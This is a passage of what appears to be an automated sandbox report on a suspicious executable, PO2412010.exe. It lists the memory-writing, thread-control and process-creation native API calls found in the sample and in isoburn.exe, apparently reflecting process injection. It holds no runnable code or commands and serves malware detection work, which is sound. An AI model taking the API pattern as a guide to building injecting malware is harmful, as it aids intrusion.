                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2FB0 NtResumeThread,3_2_01AC2FB0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2F90 NtProtectVirtualMemory,3_2_01AC2F90
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2FE0 NtCreateFile,3_2_01AC2FE0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2F30 NtCreateSection,3_2_01AC2F30
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2F60 NtCreateProcessEx,3_2_01AC2F60
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2EA0 NtAdjustPrivilegesToken,3_2_01AC2EA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2E80 NtReadVirtualMemory,3_2_01AC2E80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2EE0 NtQueueApcThread,3_2_01AC2EE0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2E30 NtWriteVirtualMemory,3_2_01AC2E30
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC3090 NtSetValueKey,3_2_01AC3090
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC3010 NtOpenDirectoryObject,3_2_01AC3010
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC39B0 NtGetContextThread,3_2_01AC39B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC3D10 NtOpenProcessToken,3_2_01AC3D10
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC3D70 NtOpenThread,3_2_01AC3D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E4650 NtSuspendThread,LdrInitializeThunk,6_2_045E4650
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E4340 NtSetContextThread,LdrInitializeThunk,6_2_045E4340
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_045E2C70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2C60 NtCreateKey,LdrInitializeThunk,6_2_045E2C60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_045E2CA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_045E2D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_045E2D30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2DD0 NtDelayExecution,LdrInitializeThunk,6_2_045E2DD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_045E2DF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_045E2EE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_045E2E80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2F30 NtCreateSection,LdrInitializeThunk,6_2_045E2F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2FE0 NtCreateFile,LdrInitializeThunk,6_2_045E2FE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2FB0 NtResumeThread,LdrInitializeThunk,6_2_045E2FB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2AD0 NtReadFile,LdrInitializeThunk,6_2_045E2AD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2AF0 NtWriteFile,LdrInitializeThunk,6_2_045E2AF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2B60 NtClose,LdrInitializeThunk,6_2_045E2B60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_045E2BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_045E2BE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_045E2BA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E35C0 NtCreateMutant,LdrInitializeThunk,6_2_045E35C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E39B0 NtGetContextThread,LdrInitializeThunk,6_2_045E39B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2C00 NtQueryInformationProcess,6_2_045E2C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2CC0 NtQueryVirtualMemory,6_2_045E2CC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2CF0 NtOpenProcess,6_2_045E2CF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2D00 NtSetInformationFile,6_2_045E2D00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2DB0 NtEnumerateKey,6_2_045E2DB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2E30 NtWriteVirtualMemory,6_2_045E2E30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2EA0 NtAdjustPrivilegesToken,6_2_045E2EA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2F60 NtCreateProcessEx,6_2_045E2F60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2F90 NtProtectVirtualMemory,6_2_045E2F90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2FA0 NtQuerySection,6_2_045E2FA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2AB0 NtWaitForSingleObject,6_2_045E2AB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E2B80 NtQueryInformationFile,6_2_045E2B80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E3010 NtOpenDirectoryObject,6_2_045E3010
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E3090 NtSetValueKey,6_2_045E3090
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E3D70 NtOpenThread,6_2_045E3D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E3D10 NtOpenProcessToken,6_2_045E3D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02649210 NtReadFile,6_2_02649210
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02649300 NtDeleteFile,6_2_02649300
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_026493A0 NtClose,6_2_026493A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_026490A0 NtCreateFile,6_2_026490A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02649510 NtAllocateVirtualMemory,6_2_02649510
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_00A33E340_2_00A33E34
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_00A3E1240_2_00A3E124
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_00A36F900_2_00A36F90
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E00400_2_072E0040
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E34400_2_072E3440
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E54C80_2_072E54C8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E00270_2_072E0027
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E2FE80_2_072E2FE8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E4B080_2_072E4B08
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E4B180_2_072E4B18
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E386A0_2_072E386A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_072E38780_2_072E3878
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_08C141280_2_08C14128
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_08C112400_2_08C11240
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_08C136680_2_08C13668
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 0_2_08C112300_2_08C11230
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004185833_2_00418583
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004030403_2_00403040
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004010003_2_00401000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040E1083_2_0040E108
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040E1133_2_0040E113
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004012703_2_00401270
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004022A53_2_004022A5
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004022B03_2_004022B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00402B213_2_00402B21
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00402B303_2_00402B30
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040242E3_2_0040242E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004024303_2_00402430
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0042ECA33_2_0042ECA3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040FDAB3_2_0040FDAB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040FDB33_2_0040FDB3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004027103_2_00402710
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040DFC33_2_0040DFC3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0040FFD33_2_0040FFD3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004167933_2_00416793
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B441A23_2_01B441A2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B501AA3_2_01B501AA
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B481CC3_2_01B481CC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A801003_2_01A80100
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2A1183_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B181583_2_01B18158
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B220003_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B503E63_2_01B503E6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F03_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4A3523_2_01B4A352
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B102C03_2_01B102C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B302743_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B505913_2_01B50591
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A905353_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3E4F63_2_01B3E4F6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B344203_2_01B34420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B424463_2_01B42446
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8C7C03_2_01A8C7C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A907703_2_01A90770
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB47503_2_01AB4750
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAC6E03_2_01AAC6E0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A929A03_2_01A929A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B5A9A63_2_01B5A9A6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA69623_2_01AA6962
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A768B83_2_01A768B8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE8F03_2_01ABE8F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9A8403_2_01A9A840
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A928403_2_01A92840
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B46BD73_2_01B46BD7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4AB403_2_01B4AB40
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA803_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA8DBF3_2_01AA8DBF
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8ADE03_2_01A8ADE0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9AD003_2_01A9AD00
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2CD1F3_2_01B2CD1F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30CB53_2_01B30CB5
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A80CF23_2_01A80CF2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90C003_2_01A90C00
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0EFA03_2_01B0EFA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9CFE03_2_01A9CFE0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A82FC83_2_01A82FC8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B32F303_2_01B32F30
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD2F283_2_01AD2F28
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB0F303_2_01AB0F30
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B04F403_2_01B04F40
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4CE933_2_01B4CE93
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2E903_2_01AA2E90
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4EEDB3_2_01B4EEDB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4EE263_2_01B4EE26
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90E593_2_01A90E59
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9B1B03_2_01A9B1B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC516C3_2_01AC516C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7F1723_2_01A7F172
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B5B16B3_2_01B5B16B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4F0E03_2_01B4F0E0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B470E93_2_01B470E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A970C03_2_01A970C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3F0CC3_2_01B3F0CC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD739A3_2_01AD739A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4132D3_2_01B4132D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7D34C3_2_01A7D34C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A952A03_2_01A952A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B312ED3_2_01B312ED
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAB2C03_2_01AAB2C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2D5B03_2_01B2D5B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B595C33_2_01B595C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B475713_2_01B47571
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4F43F3_2_01B4F43F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A814603_2_01A81460
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4F7B03_2_01B4F7B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B416CC3_2_01B416CC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD56303_2_01AD5630
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B259103_2_01B25910
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A999503_2_01A99950
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAB9503_2_01AAB950
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A938E03_2_01A938E0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFD8003_2_01AFD800
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAFB803_2_01AAFB80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B05BF03_2_01B05BF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ACDBF93_2_01ACDBF9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4FB763_2_01B4FB76
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD5AA03_2_01AD5AA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B31AA33_2_01B31AA3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2DAAC3_2_01B2DAAC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3DAC63_2_01B3DAC6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B03A6C3_2_01B03A6C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B47A463_2_01B47A46
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4FA493_2_01B4FA49
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAFDC03_2_01AAFDC0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B47D733_2_01B47D73
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A93D403_2_01A93D40
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B41D5A3_2_01B41D5A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4FCF23_2_01B4FCF2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B09C323_2_01B09C32
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4FFB13_2_01B4FFB1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A91F923_2_01A91F92
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A53FD53_2_01A53FD5
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A53FD23_2_01A53FD2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4FF093_2_01B4FF09
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A99EB03_2_01A99EB0
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031963725_2_03196372
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319636A5_2_0319636A
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319EA6D5_2_0319EA6D
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031B52625_2_031B5262
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031946D25_2_031946D2
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031946C75_2_031946C7
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319CD525_2_0319CD52
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031965925_2_03196592
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031945825_2_03194582
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046624466_2_04662446
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046544206_2_04654420
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0465E4F66_2_0465E4F6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B05356_2_045B0535
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046705916_2_04670591
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045CC6E06_2_045CC6E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045D47506_2_045D4750
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B07706_2_045B0770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045AC7C06_2_045AC7C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046420006_2_04642000
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046381586_2_04638158
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045A01006_2_045A0100
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0464A1186_2_0464A118
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046681CC6_2_046681CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046701AA6_2_046701AA
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046502746_2_04650274
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046302C06_2_046302C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466A3526_2_0466A352
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046703E66_2_046703E6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045BE3F06_2_045BE3F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B0C006_2_045B0C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045A0CF26_2_045A0CF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04650CB56_2_04650CB5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045BAD006_2_045BAD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0464CD1F6_2_0464CD1F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045AADE06_2_045AADE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045C8DBF6_2_045C8DBF
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B0E596_2_045B0E59
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466EE266_2_0466EE26
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466EEDB6_2_0466EEDB
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045C2E906_2_045C2E90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466CE936_2_0466CE93
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04624F406_2_04624F40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04652F306_2_04652F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045D0F306_2_045D0F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045F2F286_2_045F2F28
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045A2FC86_2_045A2FC8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045BCFE06_2_045BCFE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0462EFA06_2_0462EFA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045BA8406_2_045BA840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B28406_2_045B2840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045DE8F06_2_045DE8F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045968B86_2_045968B8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045C69626_2_045C6962
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0467A9A66_2_0467A9A6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B29A06_2_045B29A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045AEA806_2_045AEA80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466AB406_2_0466AB40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04666BD76_2_04666BD7
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045A14606_2_045A1460
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466F43F6_2_0466F43F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046675716_2_04667571
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0464D5B06_2_0464D5B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046616CC6_2_046616CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466F7B06_2_0466F7B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466F0E06_2_0466F0E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046670E96_2_046670E9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B70C06_2_045B70C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0465F0CC6_2_0465F0CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0467B16B6_2_0467B16B
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0459F1726_2_0459F172
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045E516C6_2_045E516C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045BB1B06_2_045BB1B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_046512ED6_2_046512ED
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045CB2C06_2_045CB2C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B52A06_2_045B52A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0459D34C6_2_0459D34C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466132D6_2_0466132D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045F739A6_2_045F739A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04629C326_2_04629C32
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466FCF26_2_0466FCF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04667D736_2_04667D73
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B3D406_2_045B3D40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04661D5A6_2_04661D5A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045CFDC06_2_045CFDC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B9EB06_2_045B9EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466FF096_2_0466FF09
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B1F926_2_045B1F92
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466FFB16_2_0466FFB1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0461D8006_2_0461D800
